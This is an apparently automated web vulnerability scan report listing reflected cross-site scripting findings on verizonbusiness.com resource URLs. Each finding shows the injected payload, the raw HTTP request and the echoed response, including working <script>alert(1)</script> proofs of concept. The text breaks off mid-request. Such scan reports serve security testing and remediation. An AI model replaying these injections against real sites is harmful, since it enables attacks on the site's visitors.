<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8bd5d";90836918c73/1002a3a10-111-Tools.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.703. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcac7</script><script>alert(1)</script>fff0fe3d66e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a10-111-Tools.xmldcac7</script><script>alert(1)</script>fff0fe3d66e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "0925d1d35d73301914d390cc08b8eeb0"
Last-Modified: Wed, 17 Nov 2010 00:30:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:30:25 GMT
Content-Length: 28569
Connection: close
Set-Cookie: BERT=VRID%3d79cabeb8-1ab4-4ed1-9f07-90eb6136c520|VTID%3d0cff3359-5738-4db4-9683-6d66e8120c6e|SX%3d1289955023|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:07 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a3a10-111-Tools.xmldcac7</script><script>alert(1)</script>fff0fe3d66e</url>
...[SNIP]...

1.704. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c2a'%3bfb8c5f215e8 was submitted in the REST URL parameter 2. This input was echoed as 70c2a';fb8c5f215e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/70c2a'%3bfb8c5f215e8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/70c2a';fb8c5f215e8'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.705. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6089f'%3b4ad7cc726bd was submitted in the REST URL parameter 1. This input was echoed as 6089f';4ad7cc726bd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources6089f'%3b4ad7cc726bd/1002a3a11-111-Blogs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources6089f';4ad7cc726bd/1002a3a11-111-Blogs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.706. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aec4c"%3ba3e76068129 was submitted in the REST URL parameter 1. This input was echoed as aec4c";a3e76068129 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesaec4c"%3ba3e76068129/1002a3a11-111-Blogs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesaec4c";a3e76068129/1002a3a11-111-Blogs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.707. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e848</script><script>alert(1)</script>4c6eff3d727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a11-111-Blogs.xml7e848</script><script>alert(1)</script>4c6eff3d727 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "349a0e0cf18fc432925bc661136bb4ae"
Last-Modified: Wed, 17 Nov 2010 00:30:10 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27465
Date: Wed, 17 Nov 2010 00:30:10 GMT
Connection: close
Set-Cookie: BERT=VRID%3d4942fe9c-72f7-4a7a-9880-2974544a4023|VTID%3d1b51291c-cde5-418a-ad7a-617c0b117f7e|SX%3d1289955010|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:54 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a11-111-Blogs.xml7e848</script><script>alert(1)</script>4c6eff3d727</url>
...[SNIP]...

1.708. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27a77'%3ba4049658010 was submitted in the REST URL parameter 2. This input was echoed as 27a77';a4049658010 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/27a77'%3ba4049658010 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:15 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/27a77';a4049658010'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.709. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99991"%3bb1f7dc2f282 was submitted in the REST URL parameter 1. This input was echoed as 99991";b1f7dc2f282 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources99991"%3bb1f7dc2f282/1002a3a12-111-Newsletter.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:45 GMT
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources99991";b1f7dc2f282/1002a3a12-111-Newsletter.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.710. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ad20'%3b6a791f9fa26 was submitted in the REST URL parameter 1. This input was echoed as 3ad20';6a791f9fa26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3ad20'%3b6a791f9fa26/1002a3a12-111-Newsletter.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources3ad20';6a791f9fa26/1002a3a12-111-Newsletter.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.711. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71121'%3be4b8b1b10a5 was submitted in the REST URL parameter 2. This input was echoed as 71121';e4b8b1b10a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a12-111-Newsletter.xml71121'%3be4b8b1b10a5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:38 GMT
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/newsletters.xml71121';e4b8b1b10a5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.712. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed32"%3bd8eedb0d6d6 was submitted in the REST URL parameter 2. This input was echoed as eed32";d8eedb0d6d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a12-111-Newsletter.xmleed32"%3bd8eedb0d6d6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/newsletters.xmleed32";d8eedb0d6d6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.713. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55187'%3bda6ecc09133 was submitted in the REST URL parameter 1. This input was echoed as 55187';da6ecc09133 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources55187'%3bda6ecc09133/1002a3a13-111-Thought+Leadership.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:53 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources55187';da6ecc09133/1002a3a13-111-Thought+Leadership.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.714. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa73e"%3b7c21a186d3f was submitted in the REST URL parameter 1. This input was echoed as aa73e";7c21a186d3f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesaa73e"%3b7c21a186d3f/1002a3a13-111-Thought+Leadership.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesaa73e";7c21a186d3f/1002a3a13-111-Thought+Leadership.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.715. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 694fd"%3bccaa30d1a0f was submitted in the REST URL parameter 2. This input was echoed as 694fd";ccaa30d1a0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/694fd"%3bccaa30d1a0f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
